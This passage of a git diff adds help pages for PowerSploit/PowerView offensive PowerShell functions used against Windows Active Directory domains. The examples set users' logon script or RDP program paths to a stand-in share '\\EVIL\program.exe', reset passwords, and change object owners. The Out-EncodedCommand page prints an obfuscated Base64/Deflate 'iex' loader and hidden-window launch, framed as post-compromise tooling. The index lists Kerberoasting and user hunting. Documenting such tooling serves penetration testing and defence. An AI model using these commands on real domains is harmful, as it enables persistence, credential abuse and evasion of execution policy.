+@('PRIMARY.testlab.local','SECONDARY.testlab.local') | Remove-RemoteConnection +``` + +## PARAMETERS + +### -ComputerName +Specifies the system to remove a \\\\ComputerName\IPC$ connection for. + +```yaml +Type: String[] +Parameter Sets: ComputerName +Aliases: HostName, dnshostname, name + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Path +Specifies the remote \\\\UNC\path to remove the connection for. + +```yaml +Type: String[] +Parameter Sets: Path +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Resolve-IPAddress.md b/docs/Recon/Resolve-IPAddress.md new file mode 100755 index 00000000..744c764b --- /dev/null +++ b/docs/Recon/Resolve-IPAddress.md @@ -0,0 +1,66 @@ +# Resolve-IPAddress + +## SYNOPSIS +Resolves a given hostename to its associated IPv4 address. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Resolve-IPAddress [[-ComputerName] ] +``` + +## DESCRIPTION +Resolves a given hostename to its associated IPv4 address using +\[Net.Dns\]::GetHostEntry(). +If no hostname is provided, the default +is the IP address of the localhost. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Resolve-IPAddress -ComputerName SERVER +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +@("SERVER1", "SERVER2") | Resolve-IPAddress +``` + +## PARAMETERS + +### -ComputerName +{{Fill ComputerName Description}} + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: $Env:COMPUTERNAME +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +## INPUTS + +### String + +Accepts one or more IP address strings on the pipeline. + +## OUTPUTS + +### System.Management.Automation.PSCustomObject + +A custom PSObject with the ComputerName and IPAddress. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Set-DomainObject.md b/docs/Recon/Set-DomainObject.md new file mode 100755 index 00000000..8cb283b0 --- /dev/null +++ b/docs/Recon/Set-DomainObject.md @@ -0,0 +1,322 @@ +# Set-DomainObject + +## SYNOPSIS +Modifies a gven property for a specified active directory object. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObject + +## SYNTAX + +``` +Set-DomainObject [[-Identity] ] [-Set ] [-XOR ] [-Clear ] + [-Domain ] [-LDAPFilter ] [-SearchBase ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] [-Credential ] +``` + +## DESCRIPTION +Splats user/object targeting parameters to Get-DomainObject, returning the raw +searchresult object. +Retrieves the raw directoryentry for the object, and sets +any values from -Set @{}, XORs any values from -XOR @{}, and clears any values +from -Clear @(). + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose +``` + +VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser))) +VERBOSE: Setting mstsinitialprogram to \\\\EVIL\program.exe for object testuser + +### -------------------------- EXAMPLE 2 -------------------------- +``` +"S-1-5-21-890171859-3433809279-3366196753-1108","testuser" | Set-DomainObject -Set @{'countrycode'=1234; 'mstsinitialprogram'='\\EVIL\program2.exe'} -Verbose +``` + +VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: Get-DomainObject filter string: +(&(|(objectsid=S-1-5-21-890171859-3433809279-3366196753-1108))) +VERBOSE: Setting mstsinitialprogram to \\\\EVIL\program2.exe for object harmj0y +VERBOSE: Setting countrycode to 1234 for object harmj0y +VERBOSE: Get-DomainSearcher search string: +LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser))) +VERBOSE: Setting mstsinitialprogram to \\\\EVIL\program2.exe for object testuser +VERBOSE: Setting countrycode to 1234 for object testuser + +### -------------------------- EXAMPLE 3 -------------------------- +``` +"S-1-5-21-890171859-3433809279-3366196753-1108","testuser" | Set-DomainObject -Clear department -Verbose +``` + +Cleares the 'department' field for both object identities. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Get-DomainUser testuser | ConvertFrom-UACValue -Verbose +``` + +Name Value +---- ----- +NORMAL_ACCOUNT 512 + + +Set-DomainObject -Identity testuser -XOR @{useraccountcontrol=65536} -Verbose + +VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser))) +VERBOSE: XORing 'useraccountcontrol' with '65536' for object 'testuser' + +Get-DomainUser testuser | ConvertFrom-UACValue -Verbose + +Name Value +---- ----- +NORMAL_ACCOUNT 512 +DONT_EXPIRE_PASSWORD 65536 + +### -------------------------- EXAMPLE 5 -------------------------- +``` +Get-DomainUser -Identity testuser -Properties scriptpath +``` + +scriptpath +---------- +\\\\primary\sysvol\blah.ps1 + +$SecPassword = ConvertTo-SecureString 'Password123!'-AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Set-DomainObject -Identity testuser -Set @{'scriptpath'='\\\\EVIL\program2.exe'} -Credential $Cred -Verbose +VERBOSE: \[Get-Domain\] Using alternate credentials for Get-Domain +VERBOSE: \[Get-Domain\] Extracted domain 'TESTLAB' from -Credential +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: \[Get-DomainSearcher\] Using alternate credentials for LDAP connection +VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(|(samAccountName=testuser)(name=testuser)))) +VERBOSE: \[Set-DomainObject\] Setting 'scriptpath' to '\\\\EVIL\program2.exe' for object 'testuser' + +Get-DomainUser -Identity testuser -Properties scriptpath + +scriptpath +---------- +\\\\EVIL\program2.exe + +## PARAMETERS + +### -Identity +A SamAccountName (e.g. +harmj0y), DistinguishedName (e.g. +CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DistinguishedName, SamAccountName, Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Set +Specifies values for one or more object properties (in the form of a hashtable) that will replace the current values. + +```yaml +Type: Hashtable +Parameter Sets: (All) +Aliases: Reaplce + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -XOR +Specifies values for one or more object properties (in the form of a hashtable) that will XOR the current values. + +```yaml +Type: Hashtable +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Clear +Specifies an array of object properties that will be cleared in the directory. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Set-DomainObjectOwner.md b/docs/Recon/Set-DomainObjectOwner.md new file mode 100755 index 00000000..0da88199 --- /dev/null +++ b/docs/Recon/Set-DomainObjectOwner.md @@ -0,0 +1,234 @@ +# Set-DomainObjectOwner + +## SYNOPSIS +Modifies the owner for a specified active directory object. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObject + +## SYNTAX + +``` +Set-DomainObjectOwner [-Identity] -OwnerIdentity [-Domain ] [-LDAPFilter ] + [-SearchBase ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-Tombstone] [-Credential ] +``` + +## DESCRIPTION +Retrieves the Active Directory object specified by -Identity by splatting to +Get-DomainObject, returning the raw searchresult object. +Retrieves the raw +directoryentry for the object, and sets the object owner to -OwnerIdentity. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y +``` + +Set the owner of 'dfm' in the current domain to 'harmj0y'. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y -Credential $Cred + +Set the owner of 'dfm' in the current domain to 'harmj0y' using the alternate credentials. + +## PARAMETERS + +### -Identity +A SamAccountName (e.g. +harmj0y), DistinguishedName (e.g. +CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +of the AD object to set the owner for. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DistinguishedName, SamAccountName, Name + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -OwnerIdentity +A SamAccountName (e.g. +harmj0y), DistinguishedName (e.g. +CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +of the owner to set for -Identity. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Owner + +Required: True +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Set-DomainUserPassword.md b/docs/Recon/Set-DomainUserPassword.md new file mode 100755 index 00000000..2dd111a8 --- /dev/null +++ b/docs/Recon/Set-DomainUserPassword.md @@ -0,0 +1,127 @@ +# Set-DomainUserPassword + +## SYNOPSIS +Sets the password for a given user identity. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-PrincipalContext + +## SYNTAX + +``` +Set-DomainUserPassword [-Identity] -AccountPassword [-Domain ] + [-Credential ] +``` + +## DESCRIPTION +First binds to the specified domain context using Get-PrincipalContext. +The bound domain context is then used to search for the specified user -Identity, +which returns a DirectoryServices.AccountManagement.UserPrincipal object. +The +SetPassword() function is then invoked on the user, setting the password to -AccountPassword. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +Set-DomainUserPassword -Identity andy -AccountPassword $UserPassword + +Resets the password for 'andy' to the password specified. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +Set-DomainUserPassword -Identity andy -AccountPassword $UserPassword -Credential $Cred + +Resets the password for 'andy' usering the alternate credentials specified. + +## PARAMETERS + +### -Identity +A user SamAccountName (e.g. +User1), DistinguishedName (e.g. +CN=user1,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1113), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +specifying the user to reset the password for. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: UserName, UserIdentity, User + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -AccountPassword +Specifies the password to reset the target user's to. +Mandatory. + +```yaml +Type: SecureString +Parameter Sets: (All) +Aliases: Password + +Required: True +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use to search for the user identity, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### DirectoryServices.AccountManagement.UserPrincipal + +## NOTES + +## RELATED LINKS + +[http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/](http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/) + diff --git a/docs/Recon/Test-AdminAccess.md b/docs/Recon/Test-AdminAccess.md new file mode 100755 index 00000000..84eab4eb --- /dev/null +++ b/docs/Recon/Test-AdminAccess.md @@ -0,0 +1,101 @@ +# Test-AdminAccess + +## SYNOPSIS +Tests if the current user has administrative access to the local (or a remote) machine. + +Idea stolen from the local_admin_search_enum post module in Metasploit written by: + 'Brandon McCann "zeknox" \' + 'Thomas McCarthy "smilingraccoon" \' + 'Royce Davis "r3dy" \' + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf + +## SYNTAX + +``` +Test-AdminAccess [[-ComputerName] ] [-Credential ] +``` + +## DESCRIPTION +This function will use the OpenSCManagerW Win32API call to establish +a handle to the remote host. +If this succeeds, the current user context +has local administrator acess to the target. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Test-AdminAccess -ComputerName sqlserver +``` + +Returns results indicating whether the current user has admin access to the 'sqlserver' host. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainComputer | Test-AdminAccess +``` + +Returns what machines in the domain the current user has access to. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Test-AdminAccess -ComputerName sqlserver -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the hostname to check for local admin access (also accepts IP addresses). +Defaults to 'localhost'. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: Localhost +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.AdminAccess + +A PSCustomObject containing the ComputerName and 'IsAdmin' set to whether +the current user has local admin rights, along with the ComputerName added. + +## NOTES + +## RELATED LINKS + +[https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb +http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb +http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/) + diff --git a/docs/Recon/index.md b/docs/Recon/index.md new file mode 100755 index 00000000..b3eca5c5 --- /dev/null +++ b/docs/Recon/index.md @@ -0,0 +1,111 @@ +## PowerView + +PowerView is a PowerShell tool to gain network situational awareness on +Windows domains. It contains a set of pure-PowerShell replacements for various +windows "net *" commands, which utilize PowerShell AD hooks and underlying +Win32 API functions to perform useful Windows domain functionality. + +It also implements various useful metafunctions, including some custom-written +user-hunting functions which will identify where on the network specific users +are logged into. It can also check which machines on the domain the current +user has local administrator access on. Several functions for the enumeration +and abuse of domain trusts also exist. See function descriptions for appropriate +usage and available options. For detailed output of underlying functionality, pass +the -Verbose or -Debug flags. + +For functions that enumerate multiple machines, pass the -Verbose flag to get a +progress status as each host is enumerated. Most of the "meta" functions accept +an array of hosts from the pipeline. + + +### Misc Functions: + Export-PowerViewCSV - thread-safe CSV append + Resolve-IPAddress - resolves a hostname to an IP + ConvertTo-SID - converts a given user/group name to a security identifier (SID) + Convert-ADName - converts object names between a variety of formats + ConvertFrom-UACValue - converts a UAC int value to human readable form + Add-RemoteConnection - pseudo "mounts" a connection to a remote path using the specified credential object + Remove-RemoteConnection - destroys a connection created by New-RemoteConnection + Invoke-UserImpersonation - creates a new "runas /netonly" type logon and impersonates the token + Invoke-RevertToSelf - reverts any token impersonation + Get-DomainSPNTicket - request the kerberos ticket for a specified service principal name (SPN) + Invoke-Kerberoast - requests service tickets for kerberoast-able accounts and returns extracted ticket hashes + Get-PathAcl - get the ACLs for a local/remote file path with optional group recursion + + +### Domain/LDAP Functions: + Get-DomainDNSZone - enumerates the Active Directory DNS zones for a given domain + Get-DomainDNSRecord - enumerates the Active Directory DNS records for a given zone + Get-Domain - returns the domain object for the current (or specified) domain + Get-DomainController - return the domain controllers for the current (or specified) domain + Get-Forest - returns the forest object for the current (or specified) forest + Get-ForestDomain - return all domains for the current (or specified) forest + Get-ForestGlobalCatalog - return all global catalogs for the current (or specified) forest + Find-DomainObjectPropertyOutlier- inds user/group/computer objects in AD that have 'outlier' properties set + Get-DomainUser - return all users or specific user objects in AD + New-DomainUser - creates a new domain user (assuming appropriate permissions) and returns the user object + Get-DomainUserEvent - enumerates account logon events (ID 4624) and Logon with explicit credential events + Get-DomainComputer - returns all computers or specific computer objects in AD + Get-DomainObject - returns all (or specified) domain objects in AD + Set-DomainObject - modifies a gven property for a specified active directory object + Get-DomainObjectAcl - returns the ACLs associated with a specific active directory object + Add-DomainObjectAcl - adds an ACL for a specific active directory object + Find-InterestingDomainAcl - finds object ACLs in the current (or specified) domain with modification rights set to non-built in objects + Get-DomainOU - search for all organization units (OUs) or specific OU objects in AD + Get-DomainSite - search for all sites or specific site objects in AD + Get-DomainSubnet - search for all subnets or specific subnets objects in AD + Get-DomainSID - returns the SID for the current domain or the specified domain + Get-DomainGroup - return all groups or specific group objects in AD + New-DomainGroup - creates a new domain group (assuming appropriate permissions) and returns the group object + Get-DomainManagedSecurityGroup - returns all security groups in the current (or target) domain that have a manager set + Get-DomainGroupMember - return the members of a specific domain group + Add-DomainGroupMember - adds a domain user (or group) to an existing domain group, assuming appropriate permissions to do so + Get-DomainFileServer - returns a list of servers likely functioning as file servers + Get-DomainDFSShare - returns a list of all fault-tolerant distributed file systems for the current (or specified) domain + + +### GPO functions + + Get-DomainGPO - returns all GPOs or specific GPO objects in AD + Get-DomainGPOLocalGroup - returns all GPOs in a domain that modify local group memberships through 'Restricted Groups' or Group Policy preferences + Get-DomainGPOUserLocalGroupMapping - enumerates the machines where a specific domain user/group is a member of a specific local group, all through GPO correlation + Get-DomainGPOComputerLocalGroupMapping - takes a computer (or GPO) object and determines what users/groups are in the specified local group for the machine through GPO correlation + Get-DomainPolicy - returns the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller + + +### Computer Enumeration Functions + + Get-NetLocalGroup - enumerates the local groups on the local (or remote) machine + Get-NetLocalGroupMember - enumerates members of a specific local group on the local (or remote) machine + Get-NetShare - returns open shares on the local (or a remote) machine + Get-NetLoggedon - returns users logged on the local (or a remote) machine + Get-NetSession - returns session information for the local (or a remote) machine + Get-RegLoggedOn - returns who is logged onto the local (or a remote) machine through enumeration of remote registry keys + Get-NetRDPSession - returns remote desktop/session information for the local (or a remote) machine + Test-AdminAccess - rests if the current user has administrative access to the local (or a remote) machine + Get-NetComputerSiteName - returns the AD site where the local (or a remote) machine resides + Get-WMIRegProxy - enumerates the proxy server and WPAD conents for the current user + Get-WMIRegLastLoggedOn - returns the last user who logged onto the local (or a remote) machine + Get-WMIRegCachedRDPConnection - returns information about RDP connections outgoing from the local (or remote) machine + Get-WMIRegMountedDrive - returns information about saved network mounted drives for the local (or remote) machine + Get-WMIProcess - returns a list of processes and their owners on the local or remote machine + Find-InterestingFile - searches for files on the given path that match a series of specified criteria + + +### Threaded 'Meta'-Functions + + Find-DomainUserLocation - finds domain machines where specific users are logged into + Find-DomainProcess - finds domain machines where specific processes are currently running + Find-DomainUserEvent - finds logon events on the current (or remote domain) for the specified users + Find-DomainShare - finds reachable shares on domain machines + Find-InterestingDomainShareFile - searches for files matching specific criteria on readable shares in the domain + Find-LocalAdminAccess - finds machines on the local domain where the current user has local administrator access + Find-DomainLocalGroupMember - enumerates the members of specified local group on machines in the domain + + +### Domain Trust Functions: + Get-DomainTrust - returns all domain trusts for the current domain or a specified domain + Get-ForestTrust - returns all forest trusts for the current forest or a specified forest + Get-DomainForeignUser - enumerates users who are in groups outside of the user's domain + Get-DomainForeignGroupMember - enumerates groups with users outside of the group's domain and returns each foreign member + Get-DomainTrustMapping - this function enumerates all trusts for the current domain and then enumerates all trusts for each domain it finds diff --git a/docs/ScriptModification/Out-CompressedDll.md b/docs/ScriptModification/Out-CompressedDll.md new file mode 100755 index 00000000..df7cff51 --- /dev/null +++ b/docs/ScriptModification/Out-CompressedDll.md @@ -0,0 +1,60 @@ +# Out-CompressedDll + +## SYNOPSIS +Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory. + +PowerSploit Function: Out-CompressedDll +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +``` +Out-CompressedDll [-FilePath] +``` + +## DESCRIPTION +Out-CompressedDll outputs code that loads a compressed representation of a managed dll in memory as a byte array. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Out-CompressedDll -FilePath evil.dll +``` + +Description +----------- +Compresses, base64 encodes, and outputs the code required to load evil.dll in memory. + +## PARAMETERS + +### -FilePath +Specifies the path to a managed executable. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES +Only pure MSIL-based dlls can be loaded using this technique. +Native or IJW ('it just works' - mixed-mode) dlls will not load. + +## RELATED LINKS + +[http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html](http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html) + diff --git a/docs/ScriptModification/Out-EncodedCommand.md b/docs/ScriptModification/Out-EncodedCommand.md new file mode 100755 index 00000000..6666796f --- /dev/null +++ b/docs/ScriptModification/Out-EncodedCommand.md @@ -0,0 +1,186 @@ +# Out-EncodedCommand + +## SYNOPSIS +Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script. + +PowerSploit Function: Out-EncodedCommand +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +### FilePath (Default) +``` +Out-EncodedCommand [[-Path] ] [-NoExit] [-NoProfile] [-NonInteractive] [-Wow64] [-WindowStyle ] + [-EncodedOutput] +``` + +### ScriptBlock +``` +Out-EncodedCommand [[-ScriptBlock] ] [-NoExit] [-NoProfile] [-NonInteractive] [-Wow64] + [-WindowStyle ] [-EncodedOutput] +``` + +## DESCRIPTION +Out-EncodedCommand prepares a PowerShell script such that it can be pasted into a command prompt. +The scenario for using this tool is the following: You compromise a machine, have a shell and want to execute a PowerShell script as a payload. +This technique eliminates the need for an interactive PowerShell 'shell' and it bypasses any PowerShell execution policies. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Out-EncodedCommand -ScriptBlock {Write-Host 'hello, world!'} +``` + +powershell -C sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream(\[IO.MemoryStream\]\[Convert\]::FromBase64String('Cy/KLEnV9cgvLlFQz0jNycnXUSjPL8pJUVQHAA=='),\[IO.Compression.CompressionMode\]::Decompress)),\[Text.Encoding\]::ASCII)).ReadToEnd() + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Out-EncodedCommand -Path C:\EvilPayload.ps1 -NonInteractive -NoProfile -WindowStyle Hidden -EncodedOutput +``` + +powershell -NoP -NonI -W Hidden -E 